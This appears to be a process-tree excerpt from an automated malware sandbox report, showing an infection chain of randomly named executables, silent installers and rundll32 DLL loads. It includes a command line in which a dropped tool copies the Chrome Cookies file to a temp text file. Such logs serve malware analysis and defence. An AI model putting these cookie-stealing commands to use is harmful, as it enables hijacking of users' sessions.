C:\Users\Admin\Pictures\Adobe Films\ROkEcHyqM9wugNJVZUx5TCc2.exe"C:\Users\Admin\Pictures\Adobe Films\ROkEcHyqM9wugNJVZUx5TCc2.exe"2⤵PID:3740
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:4388
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:6836
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NayP3Co9ewgDWcmlDKKSvFRf.exe"C:\Users\Admin\Pictures\Adobe Films\NayP3Co9ewgDWcmlDKKSvFRf.exe"2⤵PID:2304
-
-
C:\Users\Admin\Pictures\Adobe Films\apYOn7hdhRpuEcR5vxmJXRUC.exe"C:\Users\Admin\Pictures\Adobe Films\apYOn7hdhRpuEcR5vxmJXRUC.exe"2⤵PID:4808
-
-
C:\Users\Admin\Pictures\Adobe Films\at1tT56ZEw6khpA7A4q6zwnS.exe"C:\Users\Admin\Pictures\Adobe Films\at1tT56ZEw6khpA7A4q6zwnS.exe"2⤵PID:808
-
-
C:\Users\Admin\Pictures\Adobe Films\McmOldutr6ESC0t6rySGG0e4.exe"C:\Users\Admin\Pictures\Adobe Films\McmOldutr6ESC0t6rySGG0e4.exe"2⤵PID:4580
-
-
C:\Users\Admin\Pictures\Adobe Films\eRCQFjJWQdWvTWygSXu7rQOD.exe"C:\Users\Admin\Pictures\Adobe Films\eRCQFjJWQdWvTWygSXu7rQOD.exe"2⤵PID:4600
-
-
C:\Users\Admin\Pictures\Adobe Films\Jd9_XFjy2ttTqCHqlH1D_YCk.exe"C:\Users\Admin\Pictures\Adobe Films\Jd9_XFjy2ttTqCHqlH1D_YCk.exe"2⤵PID:4616
-
-
C:\Users\Admin\Pictures\Adobe Films\SqQ8ygn564C0k1vzTWBGU9sX.exe"C:\Users\Admin\Pictures\Adobe Films\SqQ8ygn564C0k1vzTWBGU9sX.exe"2⤵PID:4636
-
C:\Users\Public\Videos\hgfdfds.exe"C:\Users\Public\Videos\hgfdfds.exe"3⤵PID:6200
-
-
-
C:\Users\Admin\Pictures\Adobe Films\bHN6Ql6Cyo4EpwtQtZSSXExR.exe"C:\Users\Admin\Pictures\Adobe Films\bHN6Ql6Cyo4EpwtQtZSSXExR.exe"2⤵PID:4800
-
-
C:\Users\Admin\Pictures\Adobe Films\1IFja7EGAndZb4NFhszwyHKg.exe"C:\Users\Admin\Pictures\Adobe Films\1IFja7EGAndZb4NFhszwyHKg.exe"2⤵PID:4356
-
-
C:\Users\Admin\Pictures\Adobe Films\3H3gQGyjmQQOSzZvrw4EFLRG.exe"C:\Users\Admin\Pictures\Adobe Films\3H3gQGyjmQQOSzZvrw4EFLRG.exe"2⤵PID:5572
-
-
C:\Users\Admin\Pictures\Adobe Films\dqrBQZYKPOjgJjivOAfAoeUP.exe"C:\Users\Admin\Pictures\Adobe Films\dqrBQZYKPOjgJjivOAfAoeUP.exe"2⤵PID:5556
-
-
C:\Users\Admin\Pictures\Adobe Films\_C7fsxXLStYasWjQIzMRW6B8.exe"C:\Users\Admin\Pictures\Adobe Films\_C7fsxXLStYasWjQIzMRW6B8.exe"2⤵PID:5852
-
C:\Users\Admin\AppData\Local\Temp\7zS5461.tmp\Install.exe.\Install.exe3⤵PID:6860
-
C:\Users\Admin\AppData\Local\Temp\7zS988E.tmp\Install.exe.\Install.exe /S /site_id "525403"4⤵PID:5536
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-I2BPD.tmp\Thu0785d39bed3127.tmp"C:\Users\Admin\AppData\Local\Temp\is-I2BPD.tmp\Thu0785d39bed3127.tmp" /SL5="$6006A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0785d39bed3127.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3588 -
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0785d39bed3127.exe"C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0785d39bed3127.exe" /SILENT2⤵
- Executes dropped EXE
PID:2144 -
C:\Users\Admin\AppData\Local\Temp\is-7LMGJ.tmp\Thu0785d39bed3127.tmp"C:\Users\Admin\AppData\Local\Temp\is-7LMGJ.tmp\Thu0785d39bed3127.tmp" /SL5="$7006A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0785d39bed3127.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:8 -
C:\Users\Admin\AppData\Local\Temp\is-VF5K0.tmp\windllhost.exe"C:\Users\Admin\AppData\Local\Temp\is-VF5K0.tmp\windllhost.exe" 774⤵
- Executes dropped EXE
PID:4432
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3876 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Modifies registry class
PID:3936
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5776